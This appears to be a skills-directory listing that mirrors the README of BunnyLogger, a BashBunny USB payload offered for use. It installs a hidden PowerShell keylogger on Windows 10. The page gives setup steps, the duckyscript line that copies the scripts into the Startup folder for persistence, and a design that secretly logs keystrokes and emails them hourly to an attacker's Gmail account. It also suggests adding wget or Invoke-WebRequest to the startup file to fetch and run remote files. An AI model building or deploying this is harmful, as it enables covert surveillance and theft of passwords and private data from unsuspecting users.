SkillAgentSearch skills...

BunnyLogger

BunnyLogger is a BashBunny payload that uses PowerShell to log keystroke

Install / Use

/learn @PrettyBoyCosmo/BunnyLogger
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Bunny Logger

Chris Taylor [Blue Cosmo] | 08/24/21


__________                           .____                                      
\______   \__ __  ____   ____ ___.__.|    |    ____   ____   ____   ___________ 
 |    |  _/  |  \/    \ /    <   |  ||    |   /  _ \ / ___\ / ___\_/ __ \_  __ \
 |    |   \  |  /   |  \   |  \___  ||    |__(  <_> ) /_/  > /_/  >  ___/|  | \/
 |______  /____/|___|  /___|  / ____||_______ \____/\___  /\___  / \___  >__|   
        \/           \/     \/\/             \/    /_____//_____/      \/         

Update:

An New Version of This Payload Is Available HERE

Overview:

BunnyLogger is a BashBunny payload that uses PowerShell to log keystrokes
  • moves c.cmd file to windows startup directory
  • c.cmd will secretly run p.ps1
  • p.ps1 will log keystrokes
  • l.ps1 will email the logs every startup and every hour [via SMTP]
    • sends logs hourly, regardless of system time

Resources:

Requirements:

  • Gmail account
    • i suggest making a separate Gmail account for this payload
    • your Gmail must have LSA Access enabled
  • Windows 10 Target

Instructions:

Set-Up/Installation

  1. change Gmail credentials in p.ps1
# gmail credentials
$email = "example@gmail.com"
$password = "password"
  1. in line 7 of duckyscript.txt, change 'switch1' to whatever switch you use
  2. in line 7 of duckyscript.txt, change 'BashBunny' to the name of your BashBunny
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";

Extraneous:

The c.cmd attack opportunity

the c.cmd file runs every startup.
this means an attacker could place a
'wget' or 'Invoke-WebRequest' and have a file
be downloaded from anywhere on the internet onto the computer.
the file would then save in the startup directory,
allowing it to run every startup

View on GitHub
GitHub Stars16
CategoryDevelopment
Updated3mo ago
Forks3

Languages

PowerShell

Security Score

77/100

Audited on Dec 9, 2025

No findings